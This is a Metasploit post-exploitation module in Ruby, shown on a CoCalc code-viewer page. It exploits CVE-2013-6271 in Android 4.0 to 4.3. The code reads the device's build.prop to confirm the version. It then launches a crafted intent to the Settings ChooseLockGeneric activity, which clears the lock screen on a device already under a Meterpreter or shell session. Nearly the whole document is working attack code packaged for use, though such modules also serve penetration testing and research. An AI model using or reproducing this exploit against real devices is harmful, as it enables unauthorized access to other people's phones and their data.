CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  Rank = NormalRanking
8

9
  include Msf::Post::Common
10
  include Msf::Post::Android::System
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        {
17
          'Name' => 'Android Settings Remove Device Locks (4.0-4.3)',
18
          'Description' => %q{
19
            This module exploits a bug in the Android 4.0 to 4.3 com.android.settings.ChooseLockGeneric class.
20
            Any unprivileged app can exploit this vulnerability to remove the lockscreen.
21
            A logic flaw / design error exists in the settings application that allows an Intent from any
22
            application to clear the screen lock. The user may see that the Settings application has crashed,
23
            and the phone can then be unlocked by a swipe.
24
            This vulnerability was patched in Android 4.4.
25
          },
26
          'License' => MSF_LICENSE,
27
          'Author' => [
28
            'CureSec', # discovery
29
            'timwr' # metasploit module
30
          ],
31
          'References' => [
32
            [ 'CVE', '2013-6271' ],
33
            [ 'URL', 'http://blog.curesec.com/article/blog/26.html' ],
34
            [ 'URL', 'http://www.curesec.com/data/advisories/Curesec-2013-1011.pdf' ]
35
          ],
36
          'SessionTypes' => [ 'meterpreter', 'shell' ],
37
          'Platform' => 'android',
38
          'DisclosureDate' => '2013-10-11',
39
          'Compat' => {
40
            'Meterpreter' => {
41
              'Commands' => %w[
42
                android_*
43
              ]
44
            }
45
          }
46
        }
47
      )
48
    )
49
  end
50

51
  def is_version_compat?
52
    build_prop = get_build_prop
53

54
    # Sometimes cmd_exec fails to cat build_prop, so the #get_build_prop method returns
55
    # empty.
56
    if build_prop.empty?
57
      fail_with(Failure::Unknown, 'Failed to retrieve build.prop, you might need to try again.')
58
    end
59

60
    android_version = Rex::Version.new(build_prop['ro.build.version.release'])
61
    if android_version <= Rex::Version.new('4.3') && android_version >= Rex::Version.new('4.0')
62
      return true
63
    end
64

65
    false
66
  end
67

68
  def run
69
    unless is_version_compat?
70
      print_error('This module is only compatible with Android versions 4.0 to 4.3')
71
      return
72
    end
73

74
    result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end')
75
    if result.nil?
76
      print_good('Intent started, the lock screen should now be a dud.')
77
      print_good('Go ahead and manually swipe or provide any pin/password/pattern to continue.')
78
    else
79
      print_error("The Intent could not be started: #{result}")
80
    end
81
  end
82
end
83

84